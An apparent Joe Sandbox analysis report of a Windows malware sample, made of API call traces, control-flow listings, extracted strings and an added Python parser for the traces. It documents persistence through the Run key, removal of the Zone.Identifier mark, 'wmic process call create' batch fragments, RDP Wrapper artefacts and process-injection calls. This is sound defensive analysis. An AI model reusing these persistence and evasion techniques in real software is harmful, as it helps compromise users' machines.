11473->11474 11475 40ebd3 11473->11475 11474->11475 11475->11453 11477 401052 11476->11477 11478 40e8a6 CreateProcessW 11477->11478 11479 40e8ed 11478->11479 11483 405ea5 VirtualFree 11479->11483 11481 40e8fe 11481->11438 11481->11464 11482->11467 11483->11481 11485 40e95d 11484->11485 11487 40e947 WaitForMultipleObjects 11485->11487 11492 40e96f 11485->11492 11493 40e996 11485->11493 11487->11485 11488 40e976 11487->11488 11489 40e996 25 API calls 11488->11489 11489->11492 11490 40ea89 5 API calls 11491 40e98c 11490->11491 11492->11490 11494 40ea49 PeekNamedPipe 11493->11494 11495 40e9a5 11494->11495 11496 40ea67 GetLastError 
11494->11496 11497 40ea72 11495->11497 11509 401085 GetProcessHeap RtlAllocateHeap 11495->11509 11496->11497 11497->11485 11499 40e9b7 ReadFile 11499->11496 11507 40e9d9 11499->11507 11500 402f91 6 API calls 11500->11507 11502 402ecf 8 API calls 11502->11507 11504 40308c lstrlenA 11504->11507 11505 4033f5 3 API calls 11505->11507 11506 405ea5 VirtualFree 11506->11507 11507->11500 11507->11502 11507->11504 11507->11505 11507->11506 11508 403036 2 API calls 11507->11508 11510 401099 GetProcessHeap HeapFree 11507->11510 11511 402f22 11507->11511 11508->11494 11509->11499 11510->11507 11518 401085 GetProcessHeap RtlAllocateHeap 11511->11518 11513 402f33 11514 4033bf 4 API calls 11513->11514 11516 402f59 11514->11516 11515 402f63 11515->11507 11516->11515 11519 401099 GetProcessHeap HeapFree 11516->11519 11518->11513 11519->11515 11520->11425 11522 4033bf 4 API calls 11521->11522 11523 403173 11522->11523 11529 40318a 11523->11529 11525 40317b 11536 405ea5 VirtualFree 11525->11536 11527 403183 11527->11433 11528->11432 11530 40308c lstrlenA 11529->11530 11531 40319c 11530->11531 11532 40308c lstrlenA 11531->11532 11533 4031a5 11532->11533 11534 405e46 3 API calls 11533->11534 11535 4031b1 lstrcatA 11534->11535 11535->11525 11536->11527 11538 410d20 11537->11538 11539 410d08 TerminateProcess CloseHandle 11537->11539 11538->10503 11539->10503 11541 410ca4 Process32FirstW 11540->11541 11547 410cd5 11540->11547 11542 410cb4 11541->11542 11543 410cce CloseHandle 11542->11543 11544 410cbc Process32NextW 11542->11544 11545 410cdf CloseHandle 11542->11545 11543->11547 11544->11542 11546 4035e5 4 API calls 11545->11546 11546->11547 11547->10509 11549 40362d 3 API calls 11548->11549 11550 404364 11549->11550 11556 405ea5 VirtualFree 11550->11556 11552 402ae1 11552->10512 11557 405ea5 VirtualFree 11553->11557 11555 402af1 11555->10322 11556->11552 11557->11555 11578 405ea5 VirtualFree 11558->11578 11560 40ff22 11560->10520 11562 40362d 3 API calls 11561->11562 11563 4039cd 
[Control-flow graph edge list (node->node pairs annotated with API names such as VirtualFree, CreateMutexA, CoCreateInstance, OpenProcess, WriteProcessMemory, CreateRemoteThread, RegOpenKeyExW, socket, connect, send, recv) continued from the preceding functions; rendered as an interactive diagram in the original report and omitted here]

                                                Control-flow Graph
                                                [Interactive graph omitted. Basic blocks: 41290f-412949 (CoInitialize, CoCreateInstance), 412996-4129b5 (VariantInit), 412a60 (CoUninitialize); calls to 405f53, 412bc7 and 402481]
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 0041291E
                                                • CoCreateInstance.OLE32(004145E0,00000000,00000001,004173F0,?), ref: 0041293E
                                                • VariantInit.OLEAUT32(?), ref: 0041299A
                                                • CoUninitialize.OLE32 ref: 00412A60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInitInitializeInstanceUninitializeVariant
                                                • String ID: Description$FriendlyName${"A
                                                • API String ID: 4142528535-3386164859
                                                • Opcode ID: 41416dd24b6a70c272352c672e471ccd647f62b4558b7517a081743fcdaded27
                                                • Instruction ID: b2376c0ef89459fb158d6637b516917a8c550e77e28d33a2766e49f6da73c98f
                                                • Opcode Fuzzy Hash: 41416dd24b6a70c272352c672e471ccd647f62b4558b7517a081743fcdaded27
                                                • Instruction Fuzzy Hash: 8D412D74B00209AFCB24DFA5C944DEFBBB9EF84744B14845EE446EB250DB74DA81CB64

                                                Control-flow Graph
                                                [Interactive graph omitted. Single basic block 401085-401098 (GetProcessHeap, RtlAllocateHeap)]
                                                APIs
                                                • GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocateProcess
                                                • String ID:
                                                • API String ID: 1357844191-0
                                                • Opcode ID: 2ce1b78a034ac1476b0e63f24973bc94a1c952517539569c7485caeabb8436b8
                                                • Instruction ID: a18a2fe82ce61e382abdac33cea282e384ee883724b83e466bfc4f852b53c720
                                                • Opcode Fuzzy Hash: 2ce1b78a034ac1476b0e63f24973bc94a1c952517539569c7485caeabb8436b8
                                                • Instruction Fuzzy Hash: 1AB01231444200FBCF001BE09D0CF493B28ABD4713F00C410F205C1060C6314080DB15

                                                Control-flow Graph

                                                APIs
                                                • GetTickCount.KERNEL32 ref: 00413467
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00413483
                                                  • Part of subcall function 00411E21: CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00411E4E
                                                  • Part of subcall function 00411E21: GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
                                                  • Part of subcall function 00411E21: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00411E72
                                                  • Part of subcall function 00411E21: CloseHandle.KERNEL32(00000000), ref: 00411E7F
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004134EA
                                                • GetLastError.KERNEL32 ref: 004134F5
                                                • RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0041352F
                                                • RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 0041354E
                                                • RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00413563
                                                • RegCloseKey.ADVAPI32(?), ref: 00413569
                                                • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004135C5
                                                • lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004135D8
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 004135E7
                                                  • Part of subcall function 00411A3C: GetModuleFileNameW.KERNEL32(00000000,0054CBF0,00000208,00000000,00000000,?,?,?,004057B9,?,00000000,00000000), ref: 00411A58
                                                  • Part of subcall function 00411A3C: IsUserAnAdmin.SHELL32 ref: 00411A5E
                                                  • Part of subcall function 00411A3C: FindResourceW.KERNEL32(00000000,00000066,WM_DSP,?,?,?,?,004057B9,?,00000000,00000000), ref: 00411A87
                                                  • Part of subcall function 00411A3C: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A91
                                                  • Part of subcall function 00411A3C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?), ref: 00411A9B
                                                  • Part of subcall function 00411A3C: LockResource.KERNEL32(00000000,?,?,?,?,004057B9,?,00000000,00000000,?,?,?,?,?,?,00000000), ref: 00411AA2
                                                  • Part of subcall function 00411136: CopyFileW.KERNEL32 ref: 004111D7
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 00410BD9: CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00410C14
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                • MaxConnectionsPer1_0Server, xrefs: 00413545
                                                • MaxConnectionsPerServer, xrefs: 0041355A
                                                • \Microsoft Vision\, xrefs: 004135CB
                                                • Software\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 00413525
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Create$Resource$CloseHeapModuleNameProcessValue$AdminAllocateCopyCountDirectoryErrorEventFindFolderFreeHandleLastLoadLockPathReadSizeSizeofTickUserVirtuallstrcatlstrcpy
                                                • String ID: MaxConnectionsPer1_0Server$MaxConnectionsPerServer$Software\Microsoft\Windows\CurrentVersion\Internet Settings$\Microsoft Vision\
                                                • API String ID: 3138263686-2552559493
                                                • Opcode ID: 8f8f2317da5b9e5fa14dcb112acfbae29173916546146f8abef70ac2aff62589
                                                • Instruction ID: dbdc3006eb0d495d609ceabf26601cc7b31dd9cbe7e190f3516bfb7783b9e381
                                                • Opcode Fuzzy Hash: 8f8f2317da5b9e5fa14dcb112acfbae29173916546146f8abef70ac2aff62589
                                                • Instruction Fuzzy Hash: 586151B1408344AFD720EF61DC85EEB77A8EB94709F00493FF68592191DB389A84CB5A

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(0054E020), ref: 0040E710
                                                  • Part of subcall function 00405F53: GetProcessHeap.KERNEL32(00000000,000000F4,00410477,?,770113FB,00000000,00405A34), ref: 00405F56
                                                  • Part of subcall function 00405F53: HeapAlloc.KERNEL32(00000000), ref: 00405F5D
                                                  • Part of subcall function 004031D4: ExpandEnvironmentStringsW.KERNEL32(?,?,000001FF), ref: 00403207
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$AllocCriticalEnvironmentExpandFreeInitializeProcessSectionStringsVirtuallstrcpy
                                                • String ID: T$%ProgramFiles%$%ProgramW6432%$%windir%\System32$HT$TermService$TT$XT$XT$\Microsoft DN1$\rdpwrap.ini$\rfxvmt.dll$\sqlmap.dll$\T$`T$`T
                                                • API String ID: 2811233055-1205521688
                                                • Opcode ID: f9b1b9232c83a8c199dd21051ed52d462c2c0b87d5572563570c9f3229b83852
                                                • Instruction ID: b80cf716516139d3339e325f9bbf42a43c60d761a4303312119ab15767051eb6
                                                • Opcode Fuzzy Hash: f9b1b9232c83a8c199dd21051ed52d462c2c0b87d5572563570c9f3229b83852
                                                • Instruction Fuzzy Hash: 8531E370B0020067D715BF3688575AE3EADBBA670D710043FB00A7B2D1CFBC5A4A9759

                                                APIs
                                                  • Part of subcall function 0040F481: GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,00413589,?,00411618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040F4A2
                                                  • Part of subcall function 00410F6E: RegCreateKeyExW.KERNEL32(80000001,00000000,00000000,00000000,00000001,00000001,00000000,?,00000000), ref: 00410F8E
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                • CopyFileW.KERNEL32 ref: 004111D7
                                                  • Part of subcall function 0041106C: RegCreateKeyExW.ADVAPI32(770113FB,00000000,00000000,00000000,00000000,00413589,00000000,?,?), ref: 004110A0
                                                  • Part of subcall function 0041106C: RegOpenKeyExW.KERNEL32 ref: 004110BB
                                                  • Part of subcall function 00411039: RegSetValueExW.KERNEL32 ref: 00411058
                                                • SHGetKnownFolderPath.SHELL32(00414550,00000000,00000000,?), ref: 00411264
                                                • CopyFileW.KERNEL32 ref: 00411382
                                                  • Part of subcall function 0040F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040F79C
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 0040F71F: SHCreateDirectoryExW.SHELL32(00000000,?,00000000), ref: 0040F725
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
                                                • DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,770113FB,00000000), ref: 0041147C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Create$CopyFolderPathlstrcpy$CloseDeleteDirectoryFreeKnownModuleNameOpenSpecialValueVirtuallstrcat
                                                • String ID: ") do %%A$:ApplicationData$:Zone.Identifier$:start$\programs.bat$for /F "usebackq tokens=*" %%A in ("$wmic process call create '"
                                                • API String ID: 2154703971-4169938573
                                                • Opcode ID: 9264aadb901635ff11eb2832a92e62d21b073e3772fda62fef43ad282729040f
                                                • Instruction ID: 88c4e093d6dd73737c3aa0ee0195710feb8f01d0cf8726b165cb43df6b0fd163
                                                • Opcode Fuzzy Hash: 9264aadb901635ff11eb2832a92e62d21b073e3772fda62fef43ad282729040f
                                                • Instruction Fuzzy Hash: 75A12E71900109ABDF15EFA2C8929EE7B79AF94304B10406FB912771D2DF38AA45CB59
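The two listings above (the RegCreateKeyExA/RegSetValueExA writes under Internet Settings followed by the \Microsoft Vision\ drop directory, and the Run-key/CopyFileW/DeleteFileW block with :Zone.Identifier on the stack) are machine-printed call traces. What follows is an added example, not Joe Sandbox code and not code from the sample: it parses lines of exactly that format into records and reconstructs the registry writes, the drop directory and the Zone.Identifier reference from them. The input is copied from the listings above; the pairing and flagging rules are this example's own heuristics. One caveat the format itself imposes: the argument columns are raw stack slots at the call site, printed past the API's real parameter count, so values such as the return address 0041349D and the :Zone.Identifier entry in the DeleteFileW line are neighbouring stack contents, not necessarily the parameter the API received.

```python
"""Parse Joe Sandbox IDA-plugin API listing lines and reconstruct what they show.

Added example for this report (not Joe Sandbox code, not code from the sample).
LISTING is copied from the report; the pairing rules are this example's own
heuristics, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# One listing line: "• API.MODULE(arg,...), ref: ADDR" or "• API.MODULE ref: ADDR",
# optionally prefixed by "Part of subcall function ADDR: ".
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
HIVES = {"80000001": "HKCU", "80000002": "HKLM"}  # HKEY_CURRENT_USER / HKEY_LOCAL_MACHINE
REG_TYPES = {"00000001": "REG_SZ", "00000003": "REG_BINARY", "00000004": "REG_DWORD"}
CSIDL = {"0000001A": "%APPDATA%", "0000001C": "%LOCALAPPDATA%"}  # SHGetFolderPath nFolder

# Constructed input: lines copied verbatim from the two function listings above.
LISTING = r"""
• RegCreateKeyExA.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion\Internet Settings,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 0041352F
• RegSetValueExA.KERNEL32(?,MaxConnectionsPer1_0Server,00000000,00000004,?,00000004), ref: 0041354E
• RegSetValueExA.KERNEL32(?,MaxConnectionsPerServer,00000000,00000004,?,00000004), ref: 00413563
• RegCloseKey.ADVAPI32(?), ref: 00413569
• SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004135C5
• lstrcatW.KERNEL32(?,\Microsoft Vision\), ref: 004135D8
• CreateDirectoryW.KERNEL32(?,00000000), ref: 004135E7
  • Part of subcall function 00411136: CopyFileW.KERNEL32 ref: 004111D7
• DeleteFileW.KERNEL32(?,00000000,:Zone.Identifier,?,?,?,?,?,00000000,770113FB,00000000), ref: 0041147C
"""


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: Tuple[str, ...]      # raw stack slots as printed, not only the API's real parameters
    ref: int                   # address of the call instruction
    subcall_of: Optional[int]  # callee address when listed as "Part of subcall function"


def parse_listing(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers, hashes and other non-call lines
        raw = m.group("args")
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16), sub))
    return calls


def reconstruct_registry_writes(calls: List[ApiCall]) -> List[Tuple[str, str, str, int]]:
    """Attach each RegSetValueEx to the most recent RegCreateKeyEx/RegOpenKeyEx whose hive
    and subkey were recovered. The listing prints '?' for handles it could not resolve, so
    the pairing is by sequence in the listing, not by handle value (heuristic)."""
    writes, current = [], None
    for c in calls:
        if c.api.startswith(("RegCreateKeyEx", "RegOpenKeyEx")) and len(c.args) >= 2:
            hive = HIVES.get(c.args[0])
            current = f"{hive}\\{c.args[1]}" if hive and c.args[1] != "?" else None
        elif c.api.startswith("RegSetValueEx") and current and len(c.args) >= 4:
            writes.append((current, c.args[1], REG_TYPES.get(c.args[3], c.args[3]), c.ref))
        elif c.api == "RegCloseKey":
            current = None
    return writes


def reconstruct_drop_path(calls: List[ApiCall]) -> Optional[str]:
    """SHGetFolderPath(nFolder) followed by lstrcat of a literal path fragment."""
    base = None
    for c in calls:
        if c.api.startswith("SHGetFolderPath") and len(c.args) >= 2:
            base = CSIDL.get(c.args[1])
        elif base and c.api.startswith("lstrcat") and len(c.args) >= 2 and c.args[1].startswith("\\"):
            return base + c.args[1]
    return None


def flag_behaviours(calls: List[ApiCall]) -> List[str]:
    found = set()
    for c in calls:
        if c.api.startswith("RegSetValueEx") and len(c.args) >= 2 and c.args[1].startswith("MaxConnectionsPer"):
            found.add("ie_connection_limit_changed")
        # DeleteFileW takes one parameter; ':Zone.Identifier' sits in a later stack slot, so it is
        # a neighbouring value at the call site: consistent with MOTW removal, but a lead to
        # confirm in the memory dump rather than proof of the exact argument.
        if c.api.startswith("DeleteFile") and any(a.endswith(":Zone.Identifier") for a in c.args):
            found.add("zone_identifier_near_DeleteFile")
    return sorted(found)


if __name__ == "__main__":
    parsed = parse_listing(LISTING)
    for w in reconstruct_registry_writes(parsed):
        print(f"{w[0]}\\{w[1]} ({w[2]}) written at {w[3]:08X}")
    print("drop dir:", reconstruct_drop_path(parsed))
    print("flags:", flag_behaviours(parsed))
```

Running it prints the two HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings values as REG_DWORD writes, the drop directory %LOCALAPPDATA%\Microsoft Vision\ (nFolder 0x1C is CSIDL_LOCAL_APPDATA) and the two flags. The data written to the MaxConnectionsPer* values is shown as ? in the listing, so the example records the write and its type but cannot recover the value.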

Control-flow Graph (graph image not reproduced; basic blocks listed below, executed/not-executed colouring and edge list omitted)
• Basic blocks: 405ce2-405cf5 GetCommandLineA; 405cf7-405cfc; 405cfe; 405d00-405d04; 405d06-405d0d; 405d0f-405d1a; 405d1c-405d1d; 405d1f-405d21; 405d23; 405d25-405d27; 405d29; 405d2a; 405d2c-405d2e; 405d30-405d69 GetStartupInfoA, call 405d70, call 405d9d, GetModuleHandleA, call 413435, call 405d85, ExitProcess (the GetCommandLineA/GetStartupInfoA/GetModuleHandleA/ExitProcess sequence is the usual CRT entry stub, so this is the binary's entry point)
                                                APIs
                                                • GetCommandLineA.KERNEL32 ref: 00405CE9
                                                • GetStartupInfoA.KERNEL32 ref: 00405D38
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00405D54
                                                • ExitProcess.KERNEL32 ref: 00405D69
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                • String ID:
                                                • API String ID: 2164999147-0
                                                • Opcode ID: eacdaa668cf48abf2a89799ff968949de2d2c2fd9d0224425ece3e2bc3c99383
                                                • Instruction ID: b91b949f87cc3387e5335cb440a95d827ed93168e94d9b44a33dce71b5c9a03c
                                                • Opcode Fuzzy Hash: eacdaa668cf48abf2a89799ff968949de2d2c2fd9d0224425ece3e2bc3c99383
                                                • Instruction Fuzzy Hash: 700108341045442ED7242F74B44D6EB3B66DF56308B64907BE482A7292DA3E0C478E6D

Control-flow Graph (graph image not reproduced; basic blocks listed below, executed/not-executed colouring and edge list omitted)
• Basic blocks: 411e21-411e59 call 401085, CreateFileA; 411e5b; 411e5e-411e7a GetFileSize, ReadFile; 411e7c; 411e7e-411e8b CloseHandle
                                                APIs
                                                  • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
                                                  • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092
                                                • CreateFileA.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 00411E4E
                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,00000000,?,?,0041349D), ref: 00411E61
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00411E72
                                                • CloseHandle.KERNEL32(00000000), ref: 00411E7F
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Heap$AllocateCloseCreateHandleProcessReadSize
                                                • String ID:
                                                • API String ID: 2517252058-0
                                                • Opcode ID: 9cf9e135969d03e2678d2257f49f57b78742e56c31193f2db14f718b692a2705
                                                • Instruction ID: fb363df85bf2d9b02997f9a86bc51ba312390ffbc8cf422f0c30554d498563d0
                                                • Opcode Fuzzy Hash: 9cf9e135969d03e2678d2257f49f57b78742e56c31193f2db14f718b692a2705
                                                • Instruction Fuzzy Hash: 14F044B17112107FF3205B65AC09FFB769CDB55765F204135FA51E31D0E7B45D4086A8

Control-flow Graph (graph image not reproduced; basic blocks listed below, executed/not-executed colouring and edge list omitted)
• Basic blocks: 40fbfc-40fc1d GetCurrentProcess, OpenProcessToken; 40fc1f-40fc3b GetTokenInformation; 40fc3f-40fc43; 40fc45-40fc48 CloseHandle; 40fc4e-40fc57
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000008,00000000,770113FB,00000000,770113FB,00000000,?,?,?,?,00413589,?), ref: 0040FC0E
                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,?,00413589,?), ref: 0040FC15
                                                • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,00413589,?), ref: 0040FC33
                                                • CloseHandle.KERNEL32(00000000), ref: 0040FC48
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                • String ID:
                                                • API String ID: 215268677-0
                                                • Opcode ID: eaaaab6a576d5f26a59590c60b8529498a75a5c6e6a24e5c90d3c3744da6f4b8
                                                • Instruction ID: 6fb553a7aa8bf3ab883ff7ebc2a7e6bb744be305b0f627636a4dbb5773bb8036
                                                • Opcode Fuzzy Hash: eaaaab6a576d5f26a59590c60b8529498a75a5c6e6a24e5c90d3c3744da6f4b8
                                                • Instruction Fuzzy Hash: 69F0F972D00218FBEB159BA1DD0ABDEBBB8EF48741F118075EA01F6190D7749F48DA94

                                                APIs
                                                • Sleep.KERNEL32(000001F4,00000000,770113FB,00000000), ref: 00405A26
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,770113FB,?,00405A4F,h\HA,00000000), ref: 004033C8
                                                  • Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
                                                  • Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: lstrcpylstrlen$FreeSleepVirtual
                                                • String ID: h\HA$x5A
                                                • API String ID: 277671435-3533286509
                                                • Opcode ID: a0a32ffcd60a2a27e8a9ca45942fdf65d511605c6e2090140c324c1d5c973fcf
                                                • Instruction ID: 145e88e604e1605710be084c022a5ad4a2708462876eee3a1dbc8bb2c1383742
                                                • Opcode Fuzzy Hash: a0a32ffcd60a2a27e8a9ca45942fdf65d511605c6e2090140c324c1d5c973fcf
                                                • Instruction Fuzzy Hash: A8517475900149AFCB14EFA1D8D18EEBBB9AF44308B1001BED456AB296DF34BB45CF94

Control-flow Graph (graph image not reproduced; basic blocks listed below, executed/not-executed colouring and edge list omitted)
• Basic blocks: 410bd9-410c1c call 401052, CreateProcessW; 410c1e-410c26; 410c28; 410c2a-410c2d
                                                APIs
                                                • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 00410C14
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateProcess
                                                • String ID: D
                                                • API String ID: 963392458-2746444292
                                                • Opcode ID: 451e23ddb324b2de80a69945d0f840c442f30f70cf82a4394689fd4c81255151
                                                • Instruction ID: 82a8d4061ff8ab460014f0dac3b8f7e5c96f6469208adc2169ecf078a3b76cf7
                                                • Opcode Fuzzy Hash: 451e23ddb324b2de80a69945d0f840c442f30f70cf82a4394689fd4c81255151
                                                • Instruction Fuzzy Hash: CEF036B1600109AFD700DFD4CC85DEB77BCEB45348B008935F6469B250E6749D488B64

Control-flow Graph (graph image not reproduced; basic blocks listed below, executed/not-executed colouring and edge list omitted)
• Basic blocks: 41106c-41107c; 41107e-41108a call 40f731; 41108c-4110a8 RegCreateKeyExW; 4110aa-4110ac call 410fae; 4110b1-4110c3 RegOpenKeyExW; 4110c5-4110c6; 4110c8; 4110ca-4110ce
                                                APIs
                                                • RegOpenKeyExW.KERNEL32 ref: 004110BB
                                                  • Part of subcall function 0040F731: RegOpenKeyExW.ADVAPI32 ref: 0040F747
                                                • RegCreateKeyExW.ADVAPI32(770113FB,00000000,00000000,00000000,00000000,00413589,00000000,?,?), ref: 004110A0
                                                  • Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?), ref: 00410FB8
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Open$CloseCreate
                                                • String ID:
                                                • API String ID: 1752019758-0
